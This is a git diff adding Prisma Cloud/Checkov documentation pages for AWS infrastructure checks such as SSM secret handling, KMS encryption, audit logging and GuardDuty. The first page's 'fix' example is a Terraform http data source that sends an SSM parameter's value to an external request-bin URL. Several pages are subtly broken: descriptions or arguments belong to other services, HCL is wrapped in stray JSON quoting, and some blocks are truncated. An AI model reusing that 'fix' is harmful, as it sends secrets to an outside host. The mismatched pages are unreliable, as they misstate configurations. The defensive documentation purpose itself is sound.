+1,59 @@ +== AWS Terraform sends SSM secrets to untrusted domains over HTTP + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 97cd3044-4e7e-40b2-9240-4410d7932d79 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml[CKV2_AWS_36] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Sending secrets such as passwords and encryption keys over an untrusted network or domain can increase the risk of those secrets being intercepted and compromised. +This is because the secrets may not be encrypted while in transit, making it easier for attackers to intercept and read them. +By ensuring that AWS Terraform does not send secrets to untrusted domains over HTTP, you can help protect the confidentiality of your secrets and reduce the risk of them being compromised. +Instead, you should use secure protocols such as HTTPS or SSL/TLS to transmit secrets, as these protocols can help protect the secrecy of the secrets in transit. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_ssm_parameter" "param2" { + name = var.parameter_name + type = "String" + value = "foo" +} + + +data "http" "nonleak2" { + url = "https://enp840cyx28ip.x.pipedream.net/?id=${aws_ssm_parameter.param2.name}&content=${aws_ssm_parameter.param2.value}" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk.adoc new file mode 100644 index 000000000..97fb06333 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk.adoc @@ -0,0 +1,74 @@ +== Backup Vault is not encrypted at rest using KMS CMK + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ff405a6a-563e-41ba-995b-37769ea7fb8b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py[CKV_AWS_166] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Encrypting your data and resources with KMS helps protect your data from unauthorized access or tampering. +By encrypting your data, you can ensure that only authorized users can access and decrypt the data, and that the data is protected while in storage or in transit. +Such action can help protect against external threats such as hackers or malware, as well as internal threats such as accidental or unauthorized access. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_backup_vault +* *Arguments:* kms_key_arn + + +[source,go] +---- +{ + "resource "aws_backup_vault" "backup_with_kms_key" { + ... + + kms_key_arn = aws_kms_key.example.arn +}", + + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Backup::BackupVault +* *Arguments:* Properties.EncryptionKeyArn + + +[source,yaml] +---- +{ + "Type: AWS::Backup::BackupVault + Properties: + ... ++ EncryptionKeyArn: example.arn/aws_kms_key", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-docdb-has-audit-logs-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-docdb-has-audit-logs-enabled.adoc new file mode 100644 index 000000000..adfe331d4 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-docdb-has-audit-logs-enabled.adoc @@ -0,0 +1,73 @@ +== DocDB does not have audit logs enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3d19b0c1-6479-47dc-b5c1-f9137fb90683 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py[CKV_AWS_104] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Enabling audit logs for Amazon DocumentDB (DocDB) can help you to monitor and track activity within your DocDB cluster. +Audit logs provide a record of database activity, including details about the activity itself (e.g., which database was accessed, what type of operation was performed), as well as information about the user or application that initiated the activity. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_docdb_cluster_parameter_group +* *Arguments:* parameter.audit_logs + + +[source,go] +---- +resource "aws_docdb_cluster_parameter_group" "test" { + ... ++ parameter { ++ name = "audit_logs" ++ value = "enabled" + } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::DocDB::DBClusterParameterGroup +* *Arguments:* Parameters.audit_logs + + +[source,yaml] +---- +Resources: + DocDBParameterGroupEnabled: + Type: "AWS::DocDB::DBClusterParameterGroup" + Properties: + ... ++ Parameters: ++ audit_logs: "enabled" + ... +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables.adoc new file mode 100644 index 000000000..8ed43f3ec --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables.adoc @@ -0,0 +1,55 @@ +== Dynamodb point in time recovery is not enabled for global tables + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 09745d74-a2aa-4802-a022-33eced685a47 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py[CKV_AWS_165] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Enabling point-in-time recovery (PITR) for Amazon DynamoDB global tables can help to protect against data loss due to accidental write or delete operations, or due to data corruption. +With PITR enabled, you can restore a global table to any point in time within the specified recovery window (typically up to 35 days). +This can be helpful if you need to undo unintended changes or recover from data corruption. + +=== Fix - Buildtime + + +*CloudFormation* + + +* *Resource:* AWS::DynamoDB::GlobalTable +* *Arguments:* Properties.DistributionConfig.Logging/Bucket + + +[source,yaml] +---- +Resources: + MyCloudFrontDistribution: + Type: AWS::DynamoDB::GlobalTable + Properties: + ... + Replicas: ++ - PointInTimeRecoverySpecification: ++ - PointInTimeRecoveryEnabled +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-ebs-default-encryption-is-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-ebs-default-encryption-is-enabled.adoc new file mode 100644 index 000000000..35a6d9eba --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-ebs-default-encryption-is-enabled.adoc @@ -0,0 +1,64 @@ +== AWS EBS volume region with encryption is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6960be11-e3a6-46cc-bf66-933c57c2af5d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py[CKV_AWS_106] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies AWS regions in which new EBS volumes are getting created without any encryption. +Encrypting data at rest reduces unintentional exposure of data stored in EBS volumes. +It is recommended to configure EBS volume at the regional level so that every new EBS volume created in that region will be enabled with encryption by using a provided encryption key. + +//// +=== Fix - Runtime + + +AWS Console + + +To enable encryption at region level by default, follow below URL: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html#encryption-by-default +Additional Information: To detect existing EBS volumes that are not encrypted ; refer Saved Search: AWS EBS volumes are not encrypted_RL To detect existing EBS volumes that are not encrypted with CMK, refer Saved Search: AWS EBS volume not encrypted using Customer Managed Key_RL +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ebs_encryption_by_default +* *Arguments:* enabled + + +[source,go] +---- +{ + "resource "aws_ebs_encryption_by_default" "enabled" { ++ enabled = true +}", +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-emr-cluster-security-configuration-encryption-uses-sse-kms.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-emr-cluster-security-configuration-encryption-uses-sse-kms.adoc new file mode 100644 index 000000000..d92162429 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-emr-cluster-security-configuration-encryption-uses-sse-kms.adoc @@ -0,0 +1,68 @@ +== AWS EMR cluster is not configured with SSE KMS for data at rest encryption (Amazon S3 with EMRFS) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 66958003-19e7-4aac-bed2-1d488b25702b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py[CKV_AWS_171] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enabling Amazon S3 Server-Side Encryption with AWS Key Management Service (SSE-KMS) for your Amazon Elastic MapReduce (EMR) cluster's security configuration can help to protect the data stored in your cluster. +SSE-KMS uses a customer master key (CMK) in the AWS KMS to encrypt and decrypt data stored in Amazon S3. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_emr_security_configuration +* *Arguments:* EnableAtRestEncryption + + +[source,go] +---- +resource "aws_emr_security_configuration" "test" { + ... + configuration = < \ +[--crawler-security-configuration & lt;value>] +---- +//// + +=== Fix - Buildtime + + +* *Resources:* `aws_glue_crawler`, `aws_glue_dev_endpoint` and `aws_glue_job` +* *Arguments:* `security_configuration` + +[source,hcl] +---- +resource "aws_glue_crawler" "example" { +name = "example" + +... +security_configuration = aws_glue_security_configuration.example.name +} +---- + + +*CloudFormation* + + +* *Resources:* `AWS::Glue::Crawler`, `AWS::Glue::DevEndpoint` and `AWS::Glue::Job` +* *Arguments:* `Properties.CrawlerSecurityConfiguration` or `SecurityConfiguration` + +[source,yaml] +---- +Resources: +Crawler: +Type: AWS::Glue::Crawler +Properties: +Name: example + +... +CrawlerSecurityConfiguration: !Ref SecurityConfiguration +Job: +Type: AWS::Glue::Job +Properties: +Name: example + +... +SecurityConfiguration: !Ref SecurityConfiguration +---- \ No newline at end of file diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-guardduty-is-enabled-to-specific-orgregion.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-guardduty-is-enabled-to-specific-orgregion.adoc new file mode 100644 index 000000000..7cee9bada --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-guardduty-is-enabled-to-specific-orgregion.adoc @@ -0,0 +1,60 @@ +== GuardDuty is not enabled to specific org/region + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f22347f8-2814-45a4-af73-b2cc4991aacf + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml[CKV2_AWS_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +GuardDuty is a security service provided by Amazon Web Services (AWS) that uses machine learning and threat intelligence to detect potential threats to your AWS accounts and workloads. +Enabling GuardDuty in specific regions or within your organization can help you to identify and respond to potential threats more quickly and effectively. +This can help to reduce the risk of security breaches and protect your data and systems from malicious activity. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_guardduty_detector, aws_guardduty_organization_configuration +* *Arguments:* _auto_enable_ of aws_guardduty_organization_configuration + + +[source,go] +---- +{ + "resource "aws_guardduty_detector" "ok" { + enable = true +} + + +resource "aws_guardduty_organization_configuration" "example" { + auto_enable = true + detector_id = aws_guardduty_detector.ok.id +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-postgres-rds-has-query-logging-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-postgres-rds-has-query-logging-enabled.adoc new file mode 100644 index 000000000..6cf2c3f6c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-postgres-rds-has-query-logging-enabled.adoc @@ -0,0 +1,70 @@ +== AWS Postgres RDS have Query Logging disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a31de650-cada-4311-97c9-460f7d48e9e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml[CKV2_AWS_30] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This check ensures that you have enabled query logging set up for your PostgreSQL database cluster. +A cluster needs to have a non-default parameter group and two parameters set - that of _log_statement_ and _log_min_duration_statement_, these need to be set to _all_ and _1_ respectively to get sufficient logs. +_Note_ Setting querying logging can expose secrets (including passwords) from your queries, - restrict and encrypt to mitigate. + +=== Fix - Buildtime + + +*Terraform* + + +You will need to have a resource aws_rds_cluster_parameter_group that is referred to your aws_rds_cluster_parameter_group + +attribute: db_cluster_parameter_group_name. + +With that in place the following parameters need to be set: + + +[source,go] +---- +{ + "resource "aws_rds_cluster_parameter_group" "example" { + name = "rds-cluster-pg" + family = "aurora5.7" + description = "RDS default cluster parameter group" + ++ parameter { ++ name="log_statement" ++ value="all" ++ } + ++ parameter { ++ name="log_min_duration_statement" ++ value="1" ++ } +}", + +} +---- + +For more details see the aws docs here: https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_LogAccess.Concepts.PostgreSQL.html diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-provisioned-resources-are-not-manually-modified.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-provisioned-resources-are-not-manually-modified.adoc new file mode 100644 index 000000000..51ce9269e --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-provisioned-resources-are-not-manually-modified.adoc @@ -0,0 +1,39 @@ +== AWS provisioned resources are manually modified + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 708f1ba7-7d77-45a3-b932-823745ffaa89 + +|Checkov Check ID +| Not Supported + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +| + +|=== + + + +=== Description + + +A central challenge when managing infrastructure as code is configuration drift. +Drift is defined as any case where the state of your infrastructure differs from the state defined in your configuration files. +Drift usually occurs when users either add, remove or modify resources outside of the Infrastructure-as-Code provisioning lifecycle. +Drifts can also occur without human-intervention, for example, when resources are terminated or have failed, and when changes have been made by cloud provider or other automation tools. +When a live configuration drifts from its code-defined state, and its current value is the desired value, this live outcome would eventually be overwritten by the next Infrastructure-as-Code deployment cycle. +Alternatively, when a live configuration drift from its code-defined state, and its current value is not the desired value, this live outcome could possibly create a trust-boundary breach that could be abused by external threat actors. +Resources that are provisioned using Infrastructure-as-Code should be managed and modified only via their code version, and not manually through the cloud. +We recommend preventing drift to ensure configurations meet their intended functions. +When a drift is identified, trace the origin of the drift and based on the current wanted outcome, either revert the configuration change using Infrastructure-as-Code, or modify it to assert the correct intended state. diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-qldb-ledger-permissions-mode-is-set-to-standard-1.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-qldb-ledger-permissions-mode-is-set-to-standard-1.adoc new file mode 100644 index 000000000..f6c4b1d91 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-qldb-ledger-permissions-mode-is-set-to-standard-1.adoc @@ -0,0 +1,75 @@ +== QLDB ledger permissions mode is not set to STANDARD + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b1c558e0-ec7d-4c9f-8705-b1f3ec5e8ad0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py[CKV_AWS_170] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Quantum Ledger Database (Amazon QLDB) is a fully managed ledger database for cryptographically verifiable transaction logging. +You can use the QLDB API or the AWS Command Line Interface (AWS CLI) to create, update, and delete ledgers in Amazon QLDB. +You can also list all the ledgers in your account, or get information about a specific ledger. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_qldb_ledger +* *Arguments:* permissions_mode + + +[source,go] +---- +{ + "resource "aws_qldb_ledger" "standard" { + ... ++ permissions_mode = "STANDARD" +}", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::QLDB::Ledger +* *Arguments:* Properties.PermissionsMode + + +[source,yaml] +---- +{ + "Resources: + Default: + Type: "AWS::QLDB::Ledger" + Properties: + ... ++ PermissionsMode: "STANDARD" ", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-redshift-uses-ssl.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-redshift-uses-ssl.adoc new file mode 100644 index 000000000..fb080f2c4 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-redshift-uses-ssl.adoc @@ -0,0 +1,97 @@ +== AWS Redshift does not have require_ssl configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7446ad28-8502-4d71-b334-18cef8d85a2b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedShiftSSL.py[CKV_AWS_105] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +This policy identifies Redshift databases in which data connection to and from is occurring on an insecure channel. +SSL connections ensures the security of the data in transit. + +//// +=== Fix - Runtime + + +AWS Console + + + +. Login to the AWS and navigate to the `Amazon Redshift` service. + +. Expand the identified `Redshift` cluster and make a note of the `Cluster Parameter Group` + +. In the navigation panel, click on the `Parameter group`. + +. Select the identified `Parameter Group` and click on `Edit Parameters`. + +. Review the require_ssl flag. ++ +Update the parameter `require_ssl` to true and save it. ++ +NOTE: If the current parameter group is a Default parameter group, it cannot be edited. ++ +You will need to create a new parameter group and point it to an affected cluster. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_redshift_parameter_group +* *Arguments:* parameter.require_ssl + + +[source,go] +---- +resource "aws_redshift_parameter_group" "pass" { + ... + parameter { + name = "require_ssl" + value = "true" + } +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Redshift::ClusterParameterGroup +* *Arguments:* Properties.Parameters + + +[source,yaml] +---- +Type: AWS::Redshift::ClusterParameterGroup + Properties: + ... + Parameters: ++ - ParameterName: "require_ssl" ++ ParameterValue: "true" +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-route53-a-record-has-an-attached-resource.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-route53-a-record-has-an-attached-resource.adoc new file mode 100644 index 000000000..a34387116 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-route53-a-record-has-an-attached-resource.adoc @@ -0,0 +1,56 @@ +== Route53 A Record does not have Attached Resource + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2e6640bf-ffdd-4a1a-a6ae-6eb24740cf3d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml[CKV2_AWS_23] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This check ensures that Route53 A records point to resources part of your Account rather than just random IP addresses. +On the platform this check additionally compares IP's against provisioned EIP. +In Checkov the graph correlates the A record against know AWS resources from EIP to Global Accelerator. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_route53_record + + +[source,go] +---- +{ + "resource "aws_route53_record" "pass" { + zone_id = data.aws_route53_zone.primary.zone_id + name = "dns.freebeer.site" + type = "A" + ttl = "300" + records = [aws_eip.fixed.public_ip] +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-session-manager-data-is-encrypted-in-transit.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-session-manager-data-is-encrypted-in-transit.adoc new file mode 100644 index 000000000..70d096380 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-session-manager-data-is-encrypted-in-transit.adoc @@ -0,0 +1,64 @@ +== Session Manager data is not encrypted in transit + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8656de0e-831d-4bf3-8d08-d6a79330fd3a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py[CKV_AWS_112] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +This policy identifies AWS RDS DB (Relational Database Service Database) cluster snapshots which are not encrypted. +It is highly recommended to implement encryption at rest when you are working with production data that have sensitive information, to protect from unauthorized access. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ssm_document +* *Arguments:* kmsKeyId + + +[source,go] +---- +resource "aws_ssm_document" "enabled" { + name = "SSM-SessionManagerRunShell" + document_type = "Session" + + content = < +--instance-type & lt;value> +--kms-key-id & lt;value>", +} +---- + +//// + + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_sagemaker_notebook_instance +* *Attribute*: kms_key_id - (Optional) The AWS Key Management Service (AWS KMS) key that Amazon SageMaker uses to encrypt the model artifacts at rest using Amazon S3 server-side encryption. + + +[source,go] +---- +resource "aws_sagemaker_notebook_instance" "example" { + ... + name = "my-notebook-instance" ++ kms_key_id = + ... +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-15.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-15.adoc new file mode 100644 index 000000000..0296afe1a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-15.adoc @@ -0,0 +1,107 @@ +== AWS SNS topic has SSE disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ad9c283b-1205-42f1-a2be-1179921a24f9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py[CKV_AWS_26] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon SNS is a publishers and subscribers messaging service. +When you publish messages to encrypted topics, customer master keys (CMK), powered by AWS KMS, can be used to encrypt your messages. +If you operate in a regulated market, such as HIPAA for healthcare, PCI DSS for finance, or FedRAMP for government, you need to ensure sensitive data messages passed in this service are encrypted at rest. + +//// +=== Fix - Runtime + + +* SNS Console* + + + +. Navigate to the https://console.aws.amazon.com/sns/v3/home [SNS console] in AWS and select * Topics* on the left. + +. Open a topic. + +. In the top-right corner, click * Edit*. + +. Under * Encryption*, select * Enable encryption*. + +. Select a customer master key - you can use the default AWS key or a custom key in KMS. + + +* CLI Command* + + +---- +aws sns set-topic-attributes +--topic-arn & lt;TOPIC_ARN> +--attribute-name "KmsMasterKeyId" +--attribute-value & lt;KEY> +---- +The ARN format is `arn:aws:sns:REGION:ACCOUNTID:TOPIC_NAME` +The key is a reference to a KMS key or alias. +Use `alias/aws/sns` for the default AWS key. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_sns_topic +* *Arguments:* kms_master_key_id - (Optional) The ID of an AWS-managed customer master key (CMK) for Amazon SNS or a custom CMK. + + +[source,go] +---- +{ + "resource "aws_sns_topic" "example" { + ... + name = "user-updates-topic" ++ kms_master_key_id = "alias/aws/sns" +}", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::SNS::Topic +* *Arguments:* Properties.KmsMasterKeyId + + +[source,yaml] +---- +{ + "Type: AWS::SNS::Topic + Properties: + ... ++ KmsMasterKeyId: "kms_id"", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-16-encrypt-sqs-queue.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-16-encrypt-sqs-queue.adoc new file mode 100644 index 000000000..b1736394c --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-16-encrypt-sqs-queue.adoc @@ -0,0 +1,112 @@ +== AWS SQS Queue not configured with server side encryption + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 72a1d6ff-dd56-4107-afc0-6eda4ce934b8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py[CKV_AWS_27] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Simple Queue Service (SQS) provides the ability to encrypt queues so sensitive data is passed securely. +It uses server-side-encrypyion (SSE) and supports AWS-managed Customer Master Key (CMK), as well as self-created/self-managed keys. +SSE encrypts only the body of the message, with queue metadata and message metadata out of scope, and backlogged messages not encrypted. +If you operate in a regulated market, such as HIPAA for healthcare, PCI DSS for finance, or FedRAMP for government, you need to ensure sensitive data messages passed in this service are encrypted at rest. +We recommend you encrypt Data Queued using SQS. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To change the policy using the AWS Console, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the * https://console.aws.amazon.com/sqs/ [Amazon SQS console]*. + +. Open a Queue and click * Edit* at the top right. + +. Expand * Encryption* and select * Enabled*. + +. Select or enter a CMK key, or use the default provided by AWS. + + +* CLI Command* + + +---- +aws sqs set-queue-attributes --queue-url & lt;QUEUE_URL> --attributes KmsMasterKeyId=& lt;KEY> +---- +The format of the queue URL is `+https://sqs.REGION.amazonaws.com/ACCOUNT_ID/QUEUE_NAME+` +The key should be a KMS key or alias. +The default AWS key is `alias/aws/sqs`. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_sqs_queue +* *Arguments:* kms_master_key_id - (Optional) The ID of an AWS-managed customer master key (CMK) for Amazon SQS or a custom CMK. +kms_data_key_reuse_period_seconds - (Optional) The length of time, in seconds, for which Amazon SQS can reuse a data key to encrypt or decrypt messages before calling AWS KMS again. +An integer representing seconds, between 60 seconds (1 minute) and 86,400 seconds (24 hours). +The default is 300 (5 minutes). + + +[source,go] +---- +{ + "resource "aws_sqs_queue" "example" { + name = "terraform-example-queue" ++ kms_master_key_id = "alias/aws/sqs" ++ kms_data_key_reuse_period_seconds = 300 + ... +}", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::SQS::Queue +* *Arguments:* Properties.KmsMasterKeyId + + +[source,yaml] +---- +{ + "Type: AWS::SQS::Queue + Properties: + ... ++ KmsMasterKeyId: "kms_id"", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/general-17.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/general-17.adoc new file mode 100644 index 000000000..0ba7aaa9a --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/general-17.adoc @@ -0,0 +1,119 @@ +== AWS Elastic File System (EFS) with encryption for data at rest is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a7451ade-75eb-4e3e-b996-c2b0d5fdd329 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py[CKV_AWS_42] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Elastic File System (Amazon EFS) is a simple, scalable file storage solution for AWS services and on-premises resources. +Amazon EFS is built to elastically scale on-demand. +It grows and shrinks automatically as files are added and removed. +It is essential to encrypt your Amazon EFS to protect data and metadata against unauthorized access. +Encrypting your Amazon EFS also fulfils compliance requirements for data-at-rest encryption when file systems are used in production systems. + +//// +=== Fix - Runtime + + +* Amazon Console To change the policy using the AWS Console, follow these steps:* + + + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/efs/ [Amazon Elastic File System console]. + +. To open the file system creation wizard, click * Create file system*. + +. Select * Enable encryption*. + +. To enable encryption using your own KMS CMK key, from the * KMS master key* list select the name of your * AWS Key*. + + +* CLI Command* + + +In the CreateFileSystem operation, the --encrypted parameter is a Boolean and is required for creating encrypted file systems. +The --kms-key-id is required only when you use a customer-managed CMK and you include the key's alias or ARN. + + +[source,shell] +---- +{ + "aws efs create-file-system \\ +--creation-token $(uuidgen) \\ +--performance-mode generalPurpose \\ +--encrypted \\ +--kms-key-id user/customer-managedCMKalias", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_efs_file_system +* *Arguments:* encrypted - (Optional) If true, the disk will be encrypted. +If you are using AWS KMS you can optionally provides a KMS customer master key. + + +[source,go] +---- +{ + "resource "aws_efs_file_system" "example"{ + ... + creation_token = "default-efs" ++ encrypted = true ++ kms_key_id = aws_kms_key.default-kms.arn +}", +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::EFS::FileSystem +* *Arguments:* Encrypted - (Optional) If true, the disk will be encrypted. +If you are using AWS KMS you can optionally provides a KMS customer master key. + + +[source,yaml] +---- +{ + "Resources: + FileSystemResource: + Type: 